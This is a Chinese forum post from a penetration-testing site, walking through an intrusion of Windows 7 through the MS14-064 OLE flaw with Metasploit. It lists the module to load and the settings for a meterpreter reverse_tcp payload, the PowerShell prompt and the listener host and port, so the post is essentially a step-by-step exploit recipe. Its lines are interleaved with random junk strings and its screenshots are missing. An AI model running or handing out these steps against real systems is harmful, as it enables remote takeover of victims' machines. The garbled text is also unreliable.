中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]

作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

5 s' A8 {, k `# W4 M 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 2 S5 P; ~& `1 i' r- R" Q

4 q: M4 F' b1 b( M$ a

6 J0 ~2 \% N5 H r5 O% f, O& ~2 t 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , _" R0 V+ m8 p K" f% ]

' ~0 ~. W- [' x+ m

4 c9 k |# t8 a) j# y 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp* c; r5 I8 G( h+ ^

( J9 F& |3 f8 E+ H$ R

3 R/ N. n% S9 ]- {5 `5 U; ?' [             set AllowPowershellPrompt true 5 K# ^7 ^! @* \; i& z2 C( b

, a+ e% q; X7 l2 E' I! u4 M

1 m6 A& I8 d4 x* X5 `( E             Set LHOST 192.168.0.109 + `/ Q3 d9 T4 d# y& k

& U5 H5 d6 A( t+ k! R, S( l3 a/ I

% c7 t: F" v& P. X' l) B, t/ }) U6 V             set SRVHOST 192.168.0.109 ! ~8 |/ i8 \6 K, q( A

, o; j, B5 o& ~# T/ Z4 d

, K4 |. F5 q F/ S: G4 f             Set uripath share* G) Y6 V3 I: v/ }& O8 W

8 i& }4 U6 w1 ^, E

3 _) V3 O3 J2 j8 q             Set srvport 80; z1 Z8 }6 e, v5 j. y

5 R! Y/ O. j6 ^& J# r6 p7 l* F

! Z' K K( V* P   4 e8 r. V" M) n9 `/ `+ Z) {

3 X- z8 a. r, q3 n8 V

4 R2 V' m g9 m$ Q. z3 S1 Y  1 t9 V, Y1 \4 C% k; Z, ^. e

5 \- u( X# g4 O- T" q* F" V% g8 j

) s. T$ I. M9 F/ H3 k/ I   ; h9 H4 m1 w- _& ~$ d- ^4 G# N

* Z5 l0 }+ w! b7 W$ D

2 L/ Y& T, d7 ?% S6 u  # o5 o9 s' Q5 A( l

/ g6 Y0 {' Z& L- f& Y1 a

& m/ y5 @* V% F o2 x! p   / o( ?5 n& Y- @' d

) i: r. R# \2 n7 E# O

$ V9 C* g0 O* |! M' c6 A& e 下面我们来访问本地地址如图:6 a$ e+ h+ [4 ?+ ]: t7 ^

+ k4 E5 F; Y8 F$ W/ J( W

) u; Y) z2 J4 |) X9 I7 R! F, O  : Y% y4 n* e) {6 U' N) n. }

2 W2 ~) a9 v* u

1 Z' B- J7 X4 v0 g& K x- ~  ! b1 `0 W% y1 J$ g: z

1 n4 G, @/ ?$ M0 l

3 d2 Q+ ^2 u# O7 `9 A- ` v3 J+ Y/ J- n. a( K5 F8 j8 o






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2